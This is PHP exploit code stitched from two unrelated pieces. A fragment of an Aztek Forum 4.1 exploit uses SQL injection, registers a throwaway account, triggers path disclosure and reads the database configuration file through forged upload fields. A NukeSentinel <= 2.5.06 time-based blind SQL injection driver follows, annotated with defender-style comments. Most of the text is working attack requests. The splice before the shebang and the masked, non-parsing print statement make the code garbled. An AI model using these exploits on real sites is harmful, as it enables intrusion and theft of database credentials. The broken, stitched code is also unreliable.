$xpl->proxy($prs); } if (!empty($pra)) { $xpl->proxyauth($pra); } print "\nheader> Aztek Forum 4.1 Multiple Vulnerabilities Exploit"; print "\nheader> =================================================="; if (preg_match("#href='\\./index\\.php\\?owner=(\\S*)'#i", $xpl->getcontent($xpl->get($url . 'forum.php?fid=-1%20or%201=1')), $matches)) { print "\nsploit> Owner -> " . $matches[1]; } else { die("\nsploit> Exploit failed"); } $owner = $matches[1]; print "\nstatus> Trying to register a new user"; $xpl->cookiejar(1); $xpl->allowredirection(1); $name = "phpsploit" . rand(); $xpl->post($url . "index.php?owner={$owner}&action=subscribe", "login={$name}&passwd={$name}&passwd2={$name}&email={$name}%40hotmail.coum&show_email=on&cookie=on"); print "\nsploit> Login/Password -> {$name}"; print "\nstatus> Trying to get database informations"; $xpl->get($url . "forum.php?fid=XD"); if (preg_match("#file (.*) in function#i", $xpl->getcontent(), $matches)) { print "\nsploit> Full Path Disclosure -> " . $matches[1]; } else { print "\nsploit> Failed"; } $wanted = str_replace("forum/load.php", "common/bddconf.php", $matches[1]); if (!empty($wanted)) { $xpl->get($url . "index.php?owner={$owner}&action=profile&_SERVER[email]={$name}%40hotmail.coum&_FILES[upload][tmp_name]={$wanted}&_FILES[upload][name]=0123456789&_FILES[upload][type]=jpg"); $xpl->get($url . "index.php?owner={$owner}&choix=3"); if (preg_match("#<IMG src='(.*)' width='([0-9]*)' height='([0-9]*)'>#i", $xpl->getcontent(), $matches)) {
#!/usr/bin/php
<?php
/*
 * Command-line driver of a proof-of-concept for the SQL injection that the
 * usage banner below attributes to NukeSentinel <= 2.5.06 (MySQL >= 4.0.24).
 * Per the banner the result is inferred from server response time and a
 * tunable benchmark() value, i.e. a time-based blind injection.
 *
 * The listing is incomplete: getparam(), debug(), bruteforce() and the
 * phpsploit class are defined elsewhere, and the statement that prints the
 * username carries redaction residue ("******"), so the file is not valid PHP
 * as shown. The lost text is deliberately not reconstructed here.
 *
 * Defender notes, limited to what this listing shows:
 *  - Exposure: the banner names the preconditions as disable_switch<=0 (module
 *    activated) and track_active=1 on versions <= 2.5.06; check deployed
 *    version and those two settings first.
 *  - Detection: the client is configured with the literal agent string
 *    'Mozilla Firefox' (presumably sent as User-Agent; confirm in phpsploit),
 *    which is not the format a real browser sends. Because the technique is
 *    timing based, repeated requests with abnormally long response times and
 *    slow-query log entries involving BENCHMARK() are the expected traces.
 *  - Mitigation: the injected query itself is outside this listing; the general
 *    fix for this class is bound parameters in the affected query plus a
 *    database-side limit on statement execution time.
 */

// Report every error class except notices.
error_reporting(E_ALL ^ E_NOTICE);

// $argc counts the script name, so fewer than two arguments prints the usage
// banner and exits with status 1. The banner is the only place in this listing
// that states the affected product, version range and preconditions.
if ($argc < 3) {
    print "\n-- NukeSentinel <= 2.5.06 SQL Injection (mysql >= 4.0.24) Exploit ---\n-----------------------------------------------------------------------\nPHP conditions: none\nCMS conditions: disable_switch<=0 (module activated), track_active=1\n Credits: DarkFig <*****@*****.**>\n URL: http://www.acid-root.new.fr/\n-----------------------------------------------------------------------\n Usage: {$argv['0']} -url <> [Options]\n Params: -url For example http://victim.com/phpnuke/ \nOptions: -prefix Table prefix (default=nuke)\n -debug Debug mod activated (debug_ns.html)\n -truetime Server response time which returns true\n -benchmark You can change the value used in benchmark()\n -proxy If you wanna use a proxy <proxyhost:proxyport> \n -proxyauth Basic authentification <proxyuser:proxypwd>\nExample: {$argv['0']} -url http://localhost/phpnuke/ -debug\n Note: This exploit is based on the server response time\n If you have some problems use -debug, -benchmark, -truetime\n-----------------------------------------------------------------------\n";
    exit(1);
}

// Option parsing. getparam() is not shown; the second argument on "url" is
// presumably a "required" flag -- confirm against its definition.
$url = getparam("url", 1);
// Table prefix, falling back to 'nuke' when -prefix is absent or empty.
$tblprfix = getparam("prefix") != "" ? getparam("prefix") : 'nuke';
// Debug switch normalised to 1/0; the banner says debug output goes to debug_ns.html.
$debug = getparam("debug") != "" ? 1 : 0;
// Benchmark value, default '100000000'. It is only read here; the banner says it
// is the value used in benchmark(), presumably inside bruteforce() -- verify.
$benchmark = getparam("benchmark") != "" ? getparam("benchmark") : '100000000';
$proxy = getparam("proxy");
$proxyauth = getparam("proxyauth");

// HTTP client setup. Method semantics are inferred from their names (the class
// is not shown): fixed agent string, redirects off, cookie jar off.
$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
$xpl->allowredirection(0);
$xpl->cookiejar(0);

// Optional proxy and proxy credentials, applied only when supplied.
if ($proxy) {
    $xpl->proxy($proxy);
}
if ($proxyauth) {
    $xpl->proxyauth($proxyauth);
}

// debug() is defined elsewhere; called with 1 only when -debug was given.
if ($debug) {
    debug(1);
}

// NOTE(review): the "******" run below is masking residue from the page this
// listing was taken from; whatever stood between the two prompts is lost and
// the statement does not parse as written.
print "\nUsername: "******"\nPassword: ";
// bruteforce() is defined outside this listing; from the prompt it presumably
// yields the value shown after "Password:" -- confirm against its definition.
bruteforce('pwd');
exit(0);